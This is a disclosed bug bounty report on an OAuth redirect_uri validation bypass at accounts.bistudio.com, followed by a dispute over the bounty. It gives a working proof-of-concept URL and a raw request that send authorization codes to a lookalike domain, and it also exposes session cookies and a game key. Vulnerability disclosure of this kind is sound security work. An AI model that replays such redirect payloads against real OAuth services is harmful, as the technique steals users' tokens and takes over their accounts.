Stealing Users OAUTH Tokens via redirect_uri
State Resolved (Closed)
Disclosed publicly 2018-09-14T12:24:09.249Z
Reported To
Weakness Improper Authentication - Generic
Bounty
Collapse


Timeline
submitted a report to BOHEMIA INTERACTIVE a.s. .
2018-09-04T10:30:38.885Z

Hi,
I would like to report an Open redirection on oauth redirect_uri which can lead to users oauth tokens being leaked to any malicious user.

Detail

During the OAUTH flow, the redirect_uri on https://accounts.bistudio.com is not properly validating that the URL given is proper, as such a bypass of filter is possible and hence thereby able to exfiltrate users oauth tokens to that nonexisting domain.

On clicking on Login on https://xbox.dayz.com an OAUTH request is triggered to accounts.bistudio.com, the endpoint is checking if the Redirect_uri is starting with https://xbox.dayz.com and not checking the ending bits, as such its possible to inject anything after that.

As an example i injected https://xbox.dayz.comtest.com and the server's whitelist is bypasses and a redirect is performed to https://xbox.dayz.comtest.com with the code and state values.

Steps to Reproduce

  • Login to any website in the scope
  • After Login access the following URL -
https://accounts.bistudio.com/api/auth?response_type=code&redirect_uri=http%3A%2F%2Fxbox.dayz.comtest.com%2Fapi%2Fauth%2Fcallback&state=OCoU2LvhmzLGAZ03DWem5QNs&client_id=%24edd1bfdc470df4b8d7b81c2683fc6d3
  • On accessing you will get redirected to xbox.dayz.comtest.com with oauth access code and state, registering such domain is possible and when any loggedin user accesses the URL its possible to steal their oauth creds.

RAW Request

GET /api/auth?response_type=code&redirect_uri=http%3A%2F%2Fxbox.dayz.comtest.com%2Fapi%2Fauth%2Fcallback&state=OCoU2LvhmzLGAZ03DWem5QNs&client_id=%24edd1bfdc470df4b8d7b81c2683fc6d3 HTTP/1.1
Host: accounts.bistudio.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://incubator.bohemia.net/
Cookie: cookieconsent_dismissed=yes; bi.accounts.connect.sid=s%3AEbOE7LAPYR9IJO8ocyKuhNoIx_qXNt7_.UWaqiLeZPbgCSPM5nTvWUY2HiRYUXzEjw%2BRPxP3optA; bi_store_auth_session=eyJpdiI6IkcxSWloOVwvdngyaVFjZE9WM012ZzZMRmpkY1VnN1wvOW5abnkyYlNBVklaMD0iLCJ2YWx1ZSI6IjRpUFRUNzFkNElkWkZWeUc4U2o1TkNBaytURlJnVEVyaVFlMTJEc1pjcFR6XC9wUjlHdjd2cDRNQXFaN3hlZjVodHFMaW84WVFxWVJvUG1DOE4xTmtqUT09IiwibWFjIjoiZmRkZThlYjliMmZhMjc4YzBhMWVjMThkN2UxOTc5NmY3MjQ1YTc0NGFlY2FmNGVlNDUwOTU4ZjZmMGU5YTMwMSJ9
Connection: close
Upgrade-Insecure-Requests: 1

Impact

Due to validation bypass in redirect_uri parameter in OAUTH flow, its possible to redirect authenticated users to arbitrary domains with their oauth credentials from which its possible to takeover their account.

Best Regards,
EC

Regards,
Frans

ethancruize Activities::Comment
2018-09-04T10:31:48.131Z
My report contains clear steps to reproduce the vulnerability, I have mentioned the Impact in the impact section. Yes the domain affected is very much in scope.


ethancruize Activities::Comment
2018-09-06T19:37:14.938Z
Hi has anyone looked into this yet?


freespirit Activities::BugResolved
2018-09-07T14:56:59.429Z
Hello, this was an issue with a short-lived website that is now offline. But despite that, we have modified our filters so your link does not work anymore. As a token of thanks please accept this Steam Key for Arma 3: BEFXX-ZGL4P-4AQ6G


Activities::NotEligibleForBounty
2018-09-07T14:57:07.946Z


ethancruize Activities::Comment
2018-09-07T15:40:52.323Z
Hi, its a high risk vulnerability since using this its possible to steal users oauth tokens, it really doesnt matter if the domain is short-lived. If an attacker knew this information he would have used this already and probably got accecss to users tokens


ethancruize Activities::AgreedOnGoingPublic
2018-09-07T16:16:18.738Z
Let everyone see how "BOHEMIA INTERACTIVE" treats researchers efforts.


rvn Activities::Comment
2018-09-10T09:54:23.241Z
Just to clarify, the reason the issue wasn't rewarded with a bounty is because it was eliminated before it got to the developer in question, effectively making it a duplicate. He did at least do some filter modifications so we could give out at least something for this. We still cannot reward duplicates, be it HackerOne's or internal duplicates.


rvn Activities::ReportSeverityUpdated
2018-09-10T09:57:57.407Z


rvn Activities::AgreedOnGoingPublic
2018-09-14T12:24:09.142Z
Disclosed as requested


rvn Activities::ReportBecamePublic
2018-09-14T12:24:09.283Z